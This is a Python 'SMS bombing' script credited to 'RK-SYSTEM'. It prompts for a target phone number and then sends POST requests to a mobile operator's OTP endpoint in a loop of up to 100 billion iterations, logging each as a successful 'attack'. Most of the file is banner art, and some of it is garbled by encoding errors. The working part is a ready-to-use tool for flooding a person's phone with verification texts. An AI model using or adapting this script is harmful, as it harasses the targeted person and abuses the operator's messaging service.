import requests
import json

from requests.structures import CaseInsensitiveDict

import os

import sys

import time

os.system

os.system("clear")
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan

red="\033[0;31m"          # Red

yellow="\033[0;33m"       # Yellow

green="\033[0;32m"        # Green

color_off="\033[0m"       # Text Reset

bblack="\033[1;30m"       # Black

bred="\033[1;31m"         # Red

ured="\033[4;31m"         # Red

on_green="\033[42m"       # Green

lightblue = '\033[94m'

red = '\033[91m'

white = '\33[97m'

yellow = '\33[93m'

green = '\033[1;32m'

cyan  = "\033[96m"

end = '\033[0m'

purple="\033[0;35m"

on_green="\033[42m"       # Green

print(purple+"************************************************************************************************************************")
logo2=(green+"""
    ____  __ __     _______  _____________________  ___
   / __ \/ //_/    / ___/\ \/ / ___/_  __/ ____/  |/  /
  / /_/ / ,< ______\__ \  \  /\__ \ / / / __/ / /|_/ / 
 / _, _/ /| /_____/__/ /  / /___/ // / / /___/ /  / /  
/_/ |_/_/ |_|    /____/  /_//____//_/ /_____/_/  /_/
""")
line1=(purple+"************************************************************************************************************************")
logo=(bired+"""
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´ Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´`
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´`Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´`
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´
Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´
Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´
Â´Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â´
Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶
Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶
Â´Â´Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â¶Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â¶Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â¶Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´
Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´
Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â´Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â´Â´Â¶Â¶Â´Â´Â´Â´Â´Â´
Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â´Â¶Â¶Â¶Â¶Â´Â´Â´Â´Â´Â´Â´ """)
line0=(purple+"************************************************************************************************************************")

line=(purple+"======================================================================")
tversion=(cyan+"\t\t ðŸŸ¥ðŸŸ¥ THIS IS PRO VERSION ðŸŸ¥ðŸŸ¥     ")

line2=(purple+"âœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœªâœª       ")
 
dtls=(yellow+"\tâ¤ï¸â¤ï¸â¤ï¸ CREATED_BY:-RK-RAIHAN-KOBIR-KHANâ¤ï¸â¤ï¸â¤ï¸        ")

note=(cyan+"Note: THIS Is GP SMS BOMBING SYSTEM....!")
note1=(yellow+"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       ")

print(logo)
print(line1)
print(logo2)
print(line0)
print(" ")
print(line2)
print(dtls)
print(tversion)
print(line2)
print(note1)
print(note)
print(note1)





print(' ')
print(cyan+"============================================================")
number=str(input(green+"[âž™] ENTER TERGET NUMBER ðŸ‘‰  :"'\t'))
print(cyan+"============================================================"+" \n")

url = "https://www.skitto.com/home-delivery/send-otp/"+number+""

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"
headers["Content-Length"] = "0"





    
for i in range (100000000000):
      try:
          
          
          
          
          x = requests.post(url, headers=headers)
          print(cyan+"============================================================")
          print("\t "+green+str([i+1])+yellow+"ATTACK STARTED SUCCESSFULLY TO:-"+green+"["+number+"]""\n\t\t"+yellow+"  ðŸ”·ðŸ”¶ATTACK_BY:-RK-SYSTEMðŸ”·ðŸ”¶     ")
          print(yellow+"\t\tðŸ‘‰TOTAL SENDING AMOUNT is:- "+green+str([i+1])+" ðŸ”°   ")
          print(cyan+"============================================================")

          
          
          print(white+"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
          print(yellow+"\t\tâ¹ï¸THIS IS ALL REQUESTING RESPONSEâ¹ï¸   ")
          print(white+"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
          print(purple+"â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…    ")
          print(yellow+"\t\tAPI_NUMBER:-[1] REQUEST_NUMBER:-"+str([i+1])+"\n"+green+""+x.text)
          print(purple+"â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…â˜…    ")
          
     
      except:
          print("\n")
          print(red+"************************************************************")
          print (red+str ([i+1])+"\t\tâš ï¸No INTERNET CONNECTIONâš ï¸To:-"+green+"["+number+"] ")
          print(red+"************************************************************")
          time.sleep(14)
	
	
print('					')
print(green+"""
\t\t\t (THANK_YOU_RK_SYSTEM)

    ____  __ __     _______  _____________________  ___
   / __ \/ //_/    / ___/\ \/ / ___/_  __/ ____/  |/  /
  / /_/ / ,< ______\__ \  \  /\__ \ / / / __/ / /|_/ / 
 / _, _/ /| /_____/__/ /  / /___/ // / / /___/ /  / /  
/_/ |_/_/ |_|    /____/  /_//____//_/ /_____/_/  /_/""")
xn=str(input(green+" \n\t\tðŸ‘‰Press"+yellow+" Enter"+green+" To AgainðŸ‘ˆ"))


os.system("python rkmake")